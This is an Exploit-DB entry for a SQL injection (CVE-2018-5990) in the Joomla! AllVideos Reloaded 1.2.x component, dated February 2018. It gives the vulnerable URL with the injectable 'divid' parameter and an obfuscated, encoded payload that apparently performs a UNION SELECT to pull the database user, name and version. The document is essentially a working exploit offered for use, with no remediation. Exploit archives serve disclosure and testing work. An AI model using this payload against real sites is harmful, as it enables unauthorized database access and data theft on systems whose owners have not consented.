Joomla! Component AllVideos Reloaded 1.2.x - 'divid' SQL Injection

EDB-ID:

44107




Platform:

PHP

Date:

2018-02-16


# # # #
# Exploit Title: Joomla! Component AllVideos Reloaded 1.2.x - SQL Injection
# Dork: N/A
# Date: 16.02.2018
# Vendor Homepage: http://allvideos.fritz-elfert.de
# Software Link: http://joomlacode.org/gf/project/allvideos15/frs/?action=FrsReleaseBrowse&frs_package_id=3564
# Version: 1.2.x
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: CVE-2018-5990
# # # #
# Exploit Author: Ihsan Sencan 
# # # # 
# 
# POC:
# 
# 1)
# http://localhost/[PATH]/index.php?option=com_avreloaded&view=popup&Itemid=55&divid=[SQL]
#  
# JTJkJTZkJTc5JTcwJTZmJTcwJTc1JTcwJTI3JTIwJTIwJTJmJTJhJTIxJTMxJTMzJTMzJTMzJTM3JTU1JTRlJTQ5JTRmJTRlJTJhJTJmJTIwJTJmJTJhJTIxJTMxJTMzJTMzJTMzJTM3JTUzJTQ1JTRjJTQ1JTQzJTU0JTJhJTJmJTIwJTQzJTRmJTRlJTQzJTQxJTU0JTVmJTU3JTUzJTI4JTMwJTc4JTMyJTMwJTMzJTYxJTMyJTMwJTJjJTU1JTUzJTQ1JTUyJTI4JTI5JTJjJTQ0JTQxJTU0JTQxJTQyJTQxJTUzJTQ1JTI4JTI5JTJjJTU2JTQ1JTUyJTUzJTQ5JTRmJTRlJTI4JTI5JTI5JTJkJTJkJTIwJTJk
# 
# # # #